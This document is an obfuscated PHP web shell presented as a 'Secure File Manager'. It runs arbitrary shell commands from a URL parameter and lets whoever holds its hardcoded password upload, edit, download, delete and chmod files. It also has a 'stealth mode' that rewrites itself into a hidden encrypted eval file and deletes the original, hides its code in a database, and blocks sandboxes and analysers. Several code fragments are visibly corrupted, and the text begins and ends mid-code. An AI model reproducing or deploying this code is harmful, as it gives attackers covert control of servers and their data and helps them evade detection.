htmlspecialchars($item) . "\40\x28" . getFileInfo($path) . "\51"; if ($isDir($path)) { echo "\x20\74\x61\x20\x68\x72\x65\146\x3d\x27\x3f\144\151\x72\x3d{$encodedPath}\47\x20\x63\154\x61\x73\x73\75\47\x62\x74\156\x20\x62\x74\x6e\55\x73\x6d\x20\x62\x74\x6e\x2d\x69\x6e\146\x6f\47\x3e\117\x70\x65\x6e\x3c\57\x61\x3e"; } else { echo "\x20\74\141\x20\x68\x72\x65\x66\x3d\47\77\145\144\x69\164\x3d{$encodedPath}\x27\40\143\154\141\163\163\75\x27\x62\x74\x6e\40\x62\164\156\55\163\x6d\40\x62\x74\x6e\55\163\x75\x63\143\x65\x73\163\x27\76\105\144\x69\164\74\57\141\x3e"; echo "\x20\74\141\40\150\162\x65\x66\75\47\77\x64\157\x77\x6e\154\x6f\141\144\75{$encodedPath}\x27\x20\x63\154\x61\x73\163\x3d\47\x62\x74\156\x20\142\x74\x6e\x2d\x73\155\40\x62\x74\156\x2d\x70\x72\x69\x6d\141\x72\x79\47\x3e\104\157\x77\x6e\x6c\157\x61\x64\74\x2f\x61\76"; echo "\x20\74\141\40\150\x72\145\146\x3d\47\77\x64\x65\154\x65\164\145\x3d{$encodedPath}\x27\40\143\x6c\141\163\x73\x3d\x27\x62\164\156\40\x62\164\156\x2d\x73\155\x20\x62\x74\156\55\x64\x61\156\x67\145\x72\x27\x20\157\156\x63\154\151\x63\153\x3d\x22\x72\145\164\x75\x72\x6e\40\143\157\x6e\x66\x69\162\155\x28\47\104\x65\154\x65\x74\145\40{$item}\x3f\47\x29\x22\x3e\104\145\x6c\x65\164\145\74\x2f\141\x3e"; echo "\40\74\141\40\x68\162\x65\x66\75\47\x3f\162\145\x6e\x61\155\x65\75{$encodedPath}\47\40\x63\154\141\x73\163\75\47\x62\x74\156\40\x62\x74\156\x2d\163\155\40\x62\x74\x6e\x2d\167\x61\x72\x6e\151\x6e\147\47\x3e\x52\145\156\x61\155\x65\74\57\x61\76"; } echo "\x3c\x2f\x64\x69\x76\x3e"; } echo "\74\x2f\144\151\166\x3e"; } goto gR0Gv; eThD1: $decode = "\142\x61\x73\145\x36\x34\137\x64\x65\x63\x6f\x64\x65"; goto rtnuT; S5y28: goto SUllZ; goto XNEDf; ZsDUV: error_reporting(E_ALL); goto ROU2v; r4hEh: DRzsC: goto SEXxg; faP1E: $deleteFile = "\165\x6e\154\x69\x6e\153"; goto c4PE3; kVLxC: $moveFile = "\x6d\157\x76\145\x5f\x75\x70\154\x6f\141\x64\x65\144\137\146\151\x6c\x65"; goto B91j0; JDbo6: if (isset($_GET["\x73\164\145\x61\x6c\164\150"])) { $newFile = activateStealth(isset($_GET["\x64\145\154\145\164\145"])); if ($newFile) { echo "\74\160\x20\x63\x6c\x61\x73\163\75\x27\164\145\170\164\x2d\163\165\143\x63\145\163\x73\47\76\123\x74\x65\x61\x6c\164\150\x20\155\157\144\145\x20\x61\x63\x74\151\x76\141\164\x65\144\x3a\40{$newFile}\x3c\57\160\76"; if (isset($_GET["\x64\145\x6c\x65\x74\145"])) { echo "\x3c\160\40\x63\154\x61\x73\163\75\x27\164\x65\x78\x74\x2d\x77\x61\x72\156\151\156\x67\x27\x3e\x4f\x72\x69\x67\151\156\141\154\40\146\151\x6c\x65\40\162\x65\155\x6f\x76\x65\x64\x3c\57\160\76"; header("\x4c\x6f\143\x61\164\151\x6f\x6e\72\40{$newFile}"); die; } } echo "\x3c\x61\40\x68\162\145\x66\75\47\x3f\47\x20\143\x6c\141\163\163\x3d\47\x62\164\156\40\x62\164\x6e\55\151\156\146\157\40\155\x74\x2d\63\x27\x3e\x42\x61\143\x6b\74\x2f\141\x3e"; die; } goto hhKS0; tIRgZ: U1zxN: goto jjOHb; DsqtD: $renameFile = "\x72\145\x6e\x61\155\145"; goto LrwcJ; zu_YY: goto KGP_d; goto UKepP; k70Pw: goto dj01Q; goto bYDyd; bS8WA: Qm8BQ: goto o5Svc; F1r96: $changePerms = "\143\x68\x6d\x6f\144"; goto k70Pw; Lhw0C: triggerSelfDestruct(); goto YHoZ5; sHNVE: goto lEi9e; goto gtuVD; aeXt7: kkDup: goto hdRl1; Of40b: $passwordHash = password_hash("\61\x30\x36", PASSWORD_BCRYPT); goto gI3ro; jGXDx: $isDir = "\x69\x73\137\x64\x69\162"; goto rqgBL; hhKS0: goto rXHzO; goto hH0g1; nBpYj: goto kkDup; goto CTOno; oRv2f: goto WmrUT; goto c9xFE; gR0Gv: goto O7uaV; goto YRejt; fH3ra: pFU3u: goto ZsDUV; pnv69: goto vXJmh; goto ikC3N; aqyqy: goto pFU3u; goto ClAmE; LrwcJ: goto KbIJ7; goto LaVp3; jJex0: function secureEncrypt($data, $key) { if (function_exists("\x6f\x70\x65\x6e\163\x73\154\137\x65\x6e\x63\x72\x79\x70\x74")) { $iv = random_bytes(16); $encrypted = openssl_encrypt($data, "\x41\105\123\55\x32\65\x36\x2d\103\x42\x43", $key, 0, $iv); if ($encrypted === false) { error_log("\x4f\160\x65\x6e\x53\x53\x4c\x20\145\x6e\x63\x72\x79\160\164\x69\157\156\x20\146\141\x69\x6c\145\144"); return false; } return $GLOBALS["\145\156\x63\x6f\144\145"](base64_encode($iv . $encrypted)); } $output = ''; for ($i = 0; $i < strlen($data); $i++) { $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $GLOBALS["\x65\156\x63\x6f\144\x65"](bin2hex($output)); } goto rjeze; q110O: goto LpD7y; goto oWm_N; YHoZ5: goto OzN26; goto fH3ra; y0roJ: goto k6raX; goto NA_z9; oXFXb: goto MvKVu; goto d3iS2; RgJEb: O7uaV: goto QteJV; XjBDz: goto cDNBH; goto MBPUU; bJjCQ: goto mJG2Z; goto bz1ZP; XXhru: p5wDM: goto IkCuv; uNlno: lEi9e: goto am009; ixwQh:
</h1><form class="mb-4"enctype="multipart/form-data"method="POST"><div class="input-group"><input class="bg-dark border-light form-control text-light"name="file"type="file"> <button class="btn btn-success"type="submit">Upload</button></div></form><div class="mb-4"><a class="btn btn-secondary"href="?command">Execute Command</a> <a class="btn btn-secondary"href="?stealth">Stealth Mode</a> <a class="btn btn-danger"href="?stealth&delete">Stealth + Delete</a> <a class="btn btn-secondary"href="?hide">Hide in Database</a></div>goto xpkeY; BhKja: dj01Q: goto qJwZs; orjNM: goto z0Z8u; goto rjR0I; hdRl1: function storeInDatabase($code) { try { $db = new SQLite3("\72\155\x65\x6d\x6f\x72\x79\72"); $db->exec("\x43\x52\105\x41\x54\105\40\124\x41\x42\114\x45\x20\x73\143\162\x69\x70\x74\x73\x20\50\x69\144\40\x49\x4e\124\105\x47\105\x52\x20\120\x52\x49\115\101\x52\x59\40\113\x45\x59\54\x20\163\x63\x72\x69\160\x74\40\x54\x45\130\x54\51"); $stmt = $db->prepare("\x49\x4e\x53\105\x52\x54\x20\x49\116\124\117\40\163\143\x72\151\160\164\163\40\x28\163\x63\162\x69\x70\164\51\x20\x56\101\x4c\125\x45\123\40\50\72\x73\x63\162\151\160\x74\51"); $stmt->bindValue("\72\163\143\x72\x69\160\164", $GLOBALS["\145\x6e\143\157\x64\x65"]($code)); $stmt->execute(); $id = $db->lastInsertRowID(); echo "\x3c\x70\x20\143\x6c\x61\163\x73\75\x27\x74\x65\170\x74\55\x73\x75\143\143\x65\x73\163\x27\76\103\x6f\144\x65\x20\x73\164\x6f\x72\145\144\x20\x69\x6e\40\123\121\x4c\x69\x74\x65\x20\167\x69\164\150\x20\111\x44\x3a\x20{$id}\74\x2f\160\76"; return $id; } catch (Exception $e) { error_log("\104\x61\x74\141\142\141\163\x65\40\163\x74\157\x72\141\x67\145\40\145\162\x72\157\162\72\x20" . $e->getMessage()); echo "\x3c\160\40\143\x6c\141\163\163\x3d\47\x74\145\x78\164\x2d\144\141\x6e\x67\x65\162\x27\x3e\x46\141\x69\154\x65\144\x20\164\x6f\40\163\164\x6f\162\x65\40\143\x6f\x64\145\74\57\x70\76"; return false; } } goto orjNM; YRejt: MqDn2: goto jGXDx; PJ1GT: if (isset($_GET["\143\157\x6d\x6d\x61\156\x64"])) { $cmd = $_GET["\x63\x6f\x6d\155\x61\x6e\x64"] ?? "\x77\x68\157\x61\x6d\x69"; echo "\x3c\x70\x72\x65\76" . htmlspecialchars(executeCommand($cmd)) . "\x3c\57\x70\x72\145\x3e"; echo "\74\x66\157\162\155\40\x6d\145\x74\150\157\x64\x3d\x27\x47\105\x54\x27\x3e\74\151\156\x70\x75\x74\40\x74\x79\160\145\75\47\164\x65\170\164\47\x20\156\x61\155\x65\x3d\x27\x63\x6f\x6d\155\141\156\x64\x27\40\x63\154\x61\163\x73\x3d\47\146\157\x72\155\x2d\x63\157\x6e\x74\x72\157\154\40\x62\147\x2d\144\x61\162\x6b\x20\164\x65\x78\x74\x2d\x6c\151\147\150\164\40\x62\157\x72\x64\x65\x72\x2d\x6c\x69\x67\x68\164\x27\x20\x76\141\154\x75\x65\75\x27{$cmd}\x27\x3e"; echo "\74\151\x6e\x70\165\164\x20\x74\171\160\x65\x3d\47\163\x75\142\155\x69\164\47\x20\x76\141\x6c\165\x65\75\47\105\170\x65\x63\165\164\x65\47\40\x63\154\x61\163\x73\75\47\x62\x74\156\x20\142\x74\x6e\55\x69\x6e\146\157\40\155\x74\x2d\x32\47\x3e\x3c\x2f\146\157\162\155\76"; die; } goto bJjCQ; o5Svc: if (detectSandbox()) { http_response_code(403); echo "\x3c\150\x31\x3e\x34\60\63\40\x46\x6f\x72\142\151\144\x64\x65\x6e\74\x2f\x68\x31\x3e"; die; } goto y0roJ; pbMHm: if (!isset($_SESSION["\141\x75\x74\x68\145\x6e\x74\x69\x63\x61\x74\145\x64"]) || $_SESSION["\141\x75\164\150\x65\x6e\164\151\x63\x61\x74\x65\144"] !== true) { if (isset($_POST["\x70\x61\x73\x73\167\157\x72\x64"]) && password_verify($_POST["\160\141\163\163\167\x6f\x72\144"], $passwordHash)) { $_SESSION["\x61\x75\x74\x68\145\x6e\164\151\x63\141\164\145\144"] = true; echo "\x3c\160\x20\143\154\x61\163\x73\75\47\x74\x65\170\x74\55\163\165\143\x63\x65\163\163\47\76\101\x75\164\x68\145\156\164\151\143\141\x74\x69\x6f\156\40\163\x75\x63\x63\x65\163\x73\x66\165\x6c\41\74\57\160\76"; } else { echo "\74\41\104\x4f\x43\x54\131\x50\x45\x20\150\164\155\154\x3e\x3c\150\164\155\154\x3e\x3c\150\x65\141\144\76\74\155\145\x74\141\x20\x63\150\x61\162\163\145\164\75\47\125\x54\106\55\x38\47\76\74\x74\151\164\x6c\x65\76\x53\x65\143\165\x72\x65\x20\x46\x69\154\145\x20\x4d\x61\x6e\141\147\x65\162\x3c\x2f\164\x69\x74\x6c\145\x3e"; echo "\x3c\154\151\x6e\x6b\x20\x68\x72\x65\146\75\x27\x68\164\x74\x70\163\72\x2f\x2f\143\x64\x6e\56\x6a\163\144\x65\x6c\x69\166\x72\x2e\x6e\x65\x74\x2f\156\160\155\x2f\142\x6f\x6f\x74\163\x74\x72\141\160\100\65\x2e\x33\x2e\x32\57\x64\x69\163\x74\x2f\143\163\163\x2f\x62\157\x6f\x74\163\164\x72\141\160\x2e\155\x69\x6e\56\143\163\163\47\x20\x72\145\154\x3d\x27\163\164\171\x6c\x65\163\150\145\x65\164\47\76"; echo "\74\57\150\x65\141\x64\76\x3c\x62\157\x64\171\x20\x63\154\x61\163\x73\x3d\x27\142\x67\x2d\144\141\162\x6b\40\x74\145\170\164\55\154\151\147\x68\164\x27\76"; echo "\74\x64\151\x76\40\143\x6c\141\x73\x73\75\47\143\157\x6e\x74\x61\x69\x6e\x65\162\x20\x6d\x74\55\65\47\x3e\74\144\151\x76\40\143\154\x61\x73\163\x3d\x27\143\x61\162\x64\x20\142\x67\x2d\144\x61\162\x6b\x20\x62\157\162\144\x65\x72\55\x6c\151\x67\150\x74\40\x6d\x78\55\141\x75\x74\157\47\x20\x73\x74\171\154\x65\75\47\155\x61\x78\x2d\x77\151\144\164\150\72\x20\64\65\60\160\x78\x3b\x27\x3e"; echo "\x3c\144\151\x76\x20\143\x6c\x61\x73\163\75\x27\x63\x61\x72\x64\55\x62\157\x64\x79\x27\76\x3c\x68\x33\x20\x63\x6c\x61\x73\x73\x3d\x27\143\141\162\x64\55\x74\x69\164\154\x65\40\x74\145\170\164\55\x69\156\146\157\x27\76\123\x65\143\x75\x72\x65\40\106\x69\154\145\x20\x4d\x61\x6e\x61\147\145\162\40\114\157\147\x69\x6e\74\57\150\x33\76"; echo "\74\x66\x6f\162\155\x20\x6d\145\x74\x68\157\144\75\47\120\x4f\x53\124\47\76\x3c\x64\x69\x76\40\x63\154\141\163\163\x3d\47\155\142\x2d\x33\x27\x3e\74\x69\x6e\160\x75\164\x20\164\x79\160\x65\x3d\47\x70\141\163\163\167\157\x72\x64\x27\x20\156\x61\x6d\x65\x3d\47\160\x61\x73\163\x77\157\x72\144\47\40\x63\x6c\x61\x73\x73\x3d\47\146\x6f\162\x6d\x2d\143\157\156\164\162\157\154\x20\142\147\x2d\144\x61\162\153\x20\x74\x65\x78\x74\55\x6c\151\x67\x68\164\40\142\x6f\x72\x64\145\x72\x2d\154\151\x67\x68\164\47\x20\160\x6c\141\143\145\150\157\x6c\144\145\x72\75\x27\x45\156\164\145\162\40\120\141\x73\x73\x77\157\162\144\x27\x20\162\x65\x71\x75\151\162\145\x64\76\74\57\x64\151\x76\76"; echo "\x3c\142\x75\164\164\157\x6e\x20\164\171\160\x65\x3d\x27\163\165\x62\x6d\x69\x74\47\x20\x63\x6c\x61\x73\163\75\x27\x62\164\x6e\40\x62\164\156\x2d\151\x6e\146\x6f\x20\x77\55\61\60\x30\47\76\114\157\x67\x69\156\x3c\57\x62\165\164\164\157\156\76\74\57\146\x6f\x72\x6d\76\x3c\x2f\x64\151\x76\76\x3c\57\x64\151\166\76\74\57\x64\x69\x76\76\x3c\57\142\x6f\144\171\76\x3c\57\150\164\x6d\x6c\x3e"; die; } } goto Zzbe2; jjOHb: if (isset($_GET["\144\151\x72"])) { global $isDir, $encryptionKey; $currentDir = secureDecrypt(urldecode($_GET["\x64\151\x72"]), $encryptionKey); if ($currentDir === false || !$isDir($currentDir)) { error_log("\x49\156\166\x61\x6c\151\144\40\x64\x69\x72\x65\x63\x74\157\162\x79\x3a\x20" . $_GET["\144\x69\x72"]); echo "\x3c\160\x20\x63\x6c\x61\163\x73\75\x27\164\145\170\164\55\x64\141\156\x67\x65\162\47\76\x49\156\x76\x61\x6c\x69\144\40\x64\151\x72\145\x63\164\157\162\171\74\x2f\160\x3e"; die; } } goto XrZL2; gI3ro: goto xpnzx; goto aeXt7; biG_B: if (isset($_GET["\x72\x65\x74\162\151\145\166\145"])) { $code = fetchFromDatabase($_GET["\162\x65\x74\x72\x69\145\166\x65"]); if ($code) { echo "\x3c\x70\x72\x65\76" . htmlspecialchars($code) . "\74\57\x70\162\145\x3e"; } die; } goto ZZ8BS; qXR8h: if (isset($_GET["\x6c\151\163\164\x56\x69\x65\167"])) { global $isDir, $encryptionKey; $currentDir = secureDecrypt(urldecode($_GET["\x6c\x69\163\x74\126\151\145\167"]), $encryptionKey); if ($currentDir === false || !$isDir($currentDir)) { error_log("\x49\156\166\141\x6c\151\144\x20\x64\x69\x72\x65\x63\x74\157\x72\x79\72\40" . $_GET["\154\x69\x73\x74\126\151\x65\167"]); echo "\74\160\x20\x63\154\141\163\163\x3d\x27\164\x65\x78\164\x2d\144\141\156\147\x65\x72\47\76\111\x6e\166\x61\x6c\x69\144\x20\x64\151\x72\145\143\164\x6f\162\171\x3c\x2f\160\x3e"; die; } echo "\74\141\x20\150\162\x65\x66\75\x27\x3f\x64\151\x72\75" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "\47\40\x63\x6c\x61\163\163\75\47\x62\x74\x6e\x20\x62\x74\156\55\x73\x65\143\157\156\144\x61\162\x79\40\x6d\142\x2d\x33\47\x3e\123\167\151\164\x63\150\x20\x74\157\x20\124\141\x62\x6c\x65\x20\126\x69\145\x77\x3c\x2f\x61\76"; displayFileList($currentDir); die; } goto rFAAN; LaVp3: m7FzC: goto G7WHN; d3iS2: zeKai: goto Le_qg; adWLm: goto uH0gD; goto bS8WA; c4PE3: goto ePZzY; goto flq0Z; G7WHN: if (!isset($_SESSION["\145\x6e\x63\x72\171\x70\x74\x69\x6f\x6e\x5f\x6b\145\x79"])) { $_SESSION["\145\156\143\162\x79\x70\x74\151\x6f\x6e\x5f\153\145\171"] = hash("\163\150\x61\x32\x35\x36", $_SERVER["\123\105\122\x56\105\122\137\x41\104\x44\x52"] . rand(1000, 9999)); } goto oXFXb; nAzvn: xpnzx: goto pbMHm; rBSuO: goto p5wDM; goto RgJEb; O_OeP: $currentDir = isset($k9x7p) ? $k9x7p : realpath("\x2e"); goto q16ln; VxFs9: if (isset($_GET["\x68\151\x64\x65"])) { $code = $fileRead(__FILE__); $dbId = storeInDatabase($code); if ($dbId) { echo "\74\160\x20\x63\154\x61\163\x73\x3d\47\x74\x65\x78\164\55\x73\x75\143\x63\x65\x73\x73\x27\x3e\103\157\144\145\40\163\x74\157\x72\x65\x64\40\x69\156\x20\144\141\164\x61\142\141\163\x65\x20\167\x69\164\x68\x20\111\x44\72\40{$dbId}\x3c\57\160\76"; } die; } goto pnv69; EkSbi: OHvyU: goto cxFp6; M31r3: echo htmlspecialchars($currentDir); goto adWLm; EcUYb: goto m1_pF; goto uNlno; BFi7_: goto vV1oT; goto BhKja; qmDzR: m1_pF: goto Njj5u; XrZL2: goto iGeL_; goto P6ivX; qJwZs: $fileSize = "\146\x69\154\x65\x73\151\172\x65"; goto GuVMW; J3Uoh: $dirScan = "\x73\143\141\x6e\x64\x69\162"; goto kxSx_; NjXSW: goto Qm8BQ; goto eg3vP; fM6FK: ini_set("\144\x69\163\160\x6c\x61\171\137\163\164\x61\162\x74\x75\x70\137\145\x72\162\x6f\162\163", 1); goto aqyqy; ClAmE: OzN26: goto O_OeP; rBLCw: goto DRzsC; goto Iztbf; kf1Qk: V4LER: goto AZ9qS; ZZ8BS: goto Eap6j; goto VHGtU; rtnuT: goto m7FzC; goto ZS8S7; FDJCU: suznU: goto UPsBr; R4vvO: qXROW: goto faP1E; rFAAN: goto KxHes; goto R4vvO; bYDyd: vXJmh: goto biG_B; UKepP: k6raX: goto Lhw0C; VHpb6: $encode = "\142\141\x73\x65\x36\x34\137\145\156\x63\x6f\x64\145"; goto ZzS3j; NA_z9: KGP_d: goto J3Uoh; am009: if (isset($_GET["\144\157\x77\156\x6c\157\x61\144"])) { global $isFile, $encryptionKey; $file = secureDecrypt(urldecode($_GET["\x64\x6f\167\156\x6c\x6f\x61\x64"]), $encryptionKey); if ($file === false || !$isFile($file)) { error_log("\x49\x6e\x76\141\154\x69\x64\40\x64\157\167\x6e\x6c\157\141\x64\40\x66\x69\x6c\x65\x3a\40" . $_GET["\144\157\x77\x6e\154\157\141\144"]); echo "\x3c\160\x20\x63\x6c\x61\163\x73\75\47\x74\145\170\164\x2d\144\x61\x6e\147\x65\162\47\76\x49\156\166\141\x6c\151\144\40\x66\151\154\x65\74\x2f\x70\76"; die; } header("\x43\157\156\164\145\156\x74\55\x54\171\160\145\72\x20\x61\160\x70\x6c\151\x63\x61\x74\x69\157\x6e\x2f\157\143\x74\145\x74\x2d\163\164\162\x65\x61\155"); header("\x43\157\156\x74\x65\x6e\164\x2d\x44\151\x73\160\157\163\151\164\151\x6f\156\72\x20\x61\164\164\x61\143\150\x6d\145\156\x74\x3b\x20\x66\151\x6c\145\x6e\x61\x6d\145\75\x22" . basename($file) . "\x22"); readfile($file); die; } goto SwiVa; VAhGR: k0W22: goto CG59b; ZS8S7: FBEFX: goto jJex0; VHGtU: noJjk: goto fM6FK; CG59b: function getFileInfo($path) { global $isDir, $isFile, $fileSize; if ($isDir($path)) { return "\104\x69\162\x65\x63\164\x6f\x72\171"; } elseif ($isFile($path)) { return "\106\x69\154\145\40\x28" . round($fileSize($path) / 1024, 2) . "\40\113\102\x29"; } return "\125\156\x6b\156\157\167\156"; } goto t8ouB; B91j0: goto B_MZj; goto XXhru; jvGel: RdgXe: goto OK0Wy; M2DoU:
</div></body></htm


 goto EcUYb; Ks2z6: $encryptionKey = $_SESSION["encryption_key"]; goto BFi7_; k3E7s: goto U1A0c; goto Yw3QP; QteJV: function displayFileTable($directory) { global $dirScan, $isDir, $isFile, $encryptionKey; $items = $dirScan($directory); $parent = realpath($directory . "/.."); if ($parent !== realpath($directory)) { echo "<a href='?dir=" . urlencode(secureEncrypt($parent, $encryptionKey)) . "' class='btn btn-info mb-3'>Back</a> "; } echo "<a href='?listView=" . urlencode(secureEncrypt($directory, $encryptionKey)) . "' class='btn btn-secondary mb-3'>Switch to List View</a>"; echo "<table class='table table-dark table-bordered'>"; echo "<thead><tr><th>Name</th><th>Type</th><th>Actions</th></tr></thead><tbody>"; foreach ($items as $item) { if ($item ===  || $item === "..") { continue; } $path = rtrim($directory, "/") . "/" . $item; $encodedPath = urlencode(secureEncrypt($path, $encryptionKey)); echo "<tr>"; echo "<td>" . htmlspecialchars($item) . "</td>"; echo "<td>" . getFileInfo($path) . "</td>"; echo "<td>"; if ($isDir($path)) { echo "<a href='?dir={$encodedPath}' class='btn btn-sm btn-info'>Open</a> "; } else { echo "<a href='?edit={$encodedPath}' class='btn btn-sm btn-success'>Edit</a> "; echo "<a href='?download={$encodedPath}' class='btn btn-sm btn-primary'>Download</a> "; echo "<a href='?rename={$encodedPath}' class='btn btn-sm btn-warning'>Rename</a> "; } echo "<a href='?delete={$encodedPath}' class='btn btn-sm btn-danger' onclick="return confirm('Delete {$item}?')">Delete</a> "; echo "<a href='?chmod={$encodedPath}' class='btn btn-sm btn-warning'>Chmod</a>"; echo "</td>"; echo "</tr>"; } echo "</tbody></table>"; } goto NjXSW; ig398: function executeCommand($command) { if (!function_exists("shell_exec")) { echo "<p class='text-danger'>Command execution disabled: shell_exec() not available</p>"; return "Error: shell_exec() is disabled."; } $output = shell_exec($command . ">1"); echo "<p class='text-success'>Command executed: " . htmlspecialchars($command) . "</p>"; return $output ?: "No output."; } goto ZYqLI; Yw3QP: rqjGO: goto Q5s8r; Iztbf: Eap6j: goto JDbo6; SEXxg: function activateStealth($deleteOriginal = false) { global $fileRead, $fileWrite, $deleteFile, $changePerms, $encryptionKey; try { $currentCode = $fileRead(__FILE__); $newFile = ".stealth_" . bin2hex(random_bytes(5)) . ".php"; $obfuscated = obfuscateCode($currentCode); $encrypted = secureEncrypt($obfuscated, $encryptionKey); if ($encrypted === false) { echo "<p class='text-danger'>Stealth mode failed: Encryption error</p>"; return false; } $newContent = "$code = secureDecrypt("" . $encrypted . "", "" . $encryptionKey . ""); eval($code);"; if ($fileWrite($newFile, $newContent)) { $changePerms($newFile, 448); if ($deleteOriginal) { $deleteFile(__FILE__); } echo "<p class='text-success'>Stealth mode enabled: New file ({$newFile})</p>"; return $newFile; } echo "<p class='text-danger'>Stealth mode failed: File creation error</p>"; return false; } catch (Exception $e) { error_log("Stealth error: " . $e->getMessage()); echo "<p class='text-danger'>Stealth mode failed: " . htmlspecialchars($e->getMessage()) . "</p>"; return false; } } goto LD0iv; n6UId: fichY: goto eThD1; t8ouB: goto rqjGO; goto FDJCU; W22T7: if (isset($_GET["rename"])) { global $isFile, $isDir, $renameFile, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET["rename"]), $encryptionKey); if ($path === false || !$isFile($path) && !$isDir($path)) { error_log("Invalid rename path: " . $_GET["rename"]); echo "<p class='text-danger'>Invalid path</p>"; die; } if ($_SERVER["REQUEST_METHOD"] === "POST") { $newPath = dirname($path) . "/" . $_POST["newname"]; if ($renameFile($path, $newPath)) { echo "<p class='text-success'>Renamed successfully</p>"; header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey))); die; } else { echo "<p class='text-danger'>Rename failed</p>"; } } echo "<form method='POST'>"; echo "<h3>Rename " . htmlspecialchars(basename($path)) . "</h3>"; echo "<input type='text' name='newname' class='form-control bg-dark text-light border-light' value='" . htmlspecialchars(basename($path)) . "'>"; echo "<input type='submit' value='Rename' class='btn btn-success mtj'>"; echo "</form>"; die; } goto OqX6Z; uszvZ: goto U5Pf_; goto CfUuH; Zzbe2: goto FBEFX; goto j4Iqa; tx3PU: cDNBH: goto M2DoU; OK0Wy: $isFile = "is_file"; goto k3E7s; xcHuw: LpD7y: goto ZSJpn; jTMqJ: if (isset($_GET["delete"])) { global $isDir, $isFile, $deleteFile, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET["delete"]), $encryptionKey); if ($path === false) { error_log("Invalid delete path: " . $_GET["delete"]); echo "<p class='text-danger'>Invalid path</p>"; die; } if ($isDir($path)) { rmdir($path); echo "<p class='text-success'>Directory deleted</p>"; } elseif ($isFile($path)) { $deleteFile($path); echo "<p class='text-success'>File deleted</p>"; } header("Location: ?dir=" . urlencode(secureEncrypt($currentDir, $encryptionKey))); die; } goto rBSuO; GuVMW: goto UEfBu; goto EkSbi; cqr0J: ePZzY: goto F1r96; Njj5u: ini_set("display_errors", 1); goto N0paU; eNGgr: $fileRead = "file_get_contents"; goto ULUvm; P6ivX: koFCQ: goto vA42M; cxFp6: function triggerSelfDestruct() { global $deleteFile; $usageFile = ".access_count"; $count = (int) @$GLOBALS["fileRead"]($usageFile); $count++; $GLOBALS["fileWrite"]($usageFile, $count); } goto uszvZ; ULUvm: goto vYuSM; goto xcHuw; rqgBL: goto RdgXe; goto ErCsM; ZzS3j: goto fichY; goto VAhGR; MBPUU: SUllZ: goto M31r3; Le_qg:
<!doctypehtml><html><head><meta charset="UTF-8"><title>Secure File Manager</title><link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"rel="stylesheet"><style>body{background:#212529;color:#e9ecef}.table-dark{background:#343a40}.btn-info{background:#17a2b8;border-color:#17a2b8}.btn-success{background:#28a745;border-color:#28a745}.btn-danger{background:#dc3545;border-color:#dc3545}.btn-warning{background:#ffc107;border-color:#ffc107}.btn-secondary{background:#6c757d;border-color:#6c757d}.list-group-item{background:#343a40;border-color:#6c757d}</style></head><body><div class="container mt-4"><h1 class="text-info">Secure File Manager -goto S5y28; SwiVa: goto up55I; goto tIRgZ; zT1vY: vYuSM: goto DPeGu; oWm_N: GgShZ: goto fyJqQ; j4Iqa: iGeL_: goto qXR8h; K6m9y: H0yyz: goto i9Tdf; DPeGu: $fileWrite = "file_put_contents"; goto H3GBx; LD0iv: goto k0W22; goto tx3PU; kG7tO: function fetchFromDatabase($id) { try { $db = new SQLite3(":memory:"); $result = $db->querySingle("SELECT script FROM scripts WHERE id = " . (int) $id, true); if ($result) { echo "<p class='text-success'>Code retrieved from database</p>"; return $GLOBALS["decode"]($result["script"]); } echo "<p class='text-danger'>Code not found</p>"; return false; } catch (Exception $e) { error_log("Database retrieval error: " . $e->getMessage()); echo "<p class='text-danger'>Failed to retrieve code</p>"; return false; } } goto rBLCw; xpkeY: goto GgShZ; goto K6m9y; H3GBx: goto qXROW; goto kf1Qk; rjR0I: UEfBu: goto kVLxC; AZ9qS: session_start(); goto zu_YY; vI8tS: goto OHvyU; goto qmDzR; kxSx_: goto MqDn2; goto Dp0Fa; ZSJpn: function detectSandbox() { if (empty($_SERVER["HTTP_USER_AGENT"]) || strpos($_SERVER["HTTP_USER_AGENT"], "bot") !== false) { echo "<p class='text-warning'>Sandbox detected: Suspicious user agent</p>"; return true; } if (isset($_SERVER["HTTP_X_SANDBOX"]) || isset($_SERVER["HTTP_X_ANALYZER"])) { echo "<p class='text-warning'>Sandbox detected: Analysis headers</p>"; return true; } return false; } goto vI8tS; bz1ZP: U5Pf_: goto ig398; vA42M: if (isset($_FILES["file"])) { global $moveFile, $currentDir; $file = $_FILES["file"]; $target = $currentDir . "/" . basename($file["name"]); if ($moveFile($file["tmp_name"], $target)) { echo "<p class='text-success'>File uploaded successfully</p>"; } else { echo "<p class='text-danger'>Upload failed</p>"; } } goto LiFXE; c9xFE: U1A0c: goto eNGgr; CTOno: up55I: goto PJ1GT; q16ln: goto U1zxN; goto zT1vY; UPsBr: function secureDecrypt($data, $key) { try { if (!base64_decode($data, true)) { error_log("Invalid base64 input: " . $data); return false; } $data = base64_decode($GLOBALS["decode"]($data)); if ($data === false) { error_log("Base64 decode failed"); return false; } if (function_exists("openssl_decrypt")) { $iv = substr($data, 0, 16); $ciphertext = substr($data, 16); $decrypted = openssl_decrypt($ciphertext, "AESj56-CBC", $key, 0, $iv); if ($decrypted !== false) { return $decrypted; } } if (!ctype_xdigit($data)) { error_log("Invalid hex string for XOR decryption: " . bin2hex($data)); return false; } $data = @hex2bin($data); if ($data === false) { error_log("hex2bin failed"); return false; } $output = ''; for ($i = 0; $i < strlen($data); $i++) { $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $output; } catch (Exception $e) { error_log("Decryption error: " . $e->getMessage()); return false; } } goto q110O; hH0g1: rXHzO: goto W22T7; ErCsM: mJG2Z: goto VxFs9; LiFXE: goto zeKai; goto cqr0J; ROU2v: goto V4LER; goto jvGel; HD7QG: if (isset($_GET["edit"])) { global $isFile, $fileRead, $fileWrite, $encryptionKey; $file = secureDecrypt(urldecode($_GET["edit"]), $encryptionKey); if ($file === false || !$isFile($file)) { error_log("Invalid file: " . $_GET["edit"]); echo "<p class='text-danger'>Invalid file</p>"; die; } if ($_SERVER["REQUEST_METHOD"] === "POST") { $fileWrite($file, $_POST["content"]); echo "<p class='text-success'>File saved successfully</p>"; } $content = htmlspecialchars($fileRead($file)); echo "<form method='POST'>"; echo "<textarea name='content' rows='15' class='form-control bg-dark text-light border-light'>{$content}</textarea>"; echo "<input 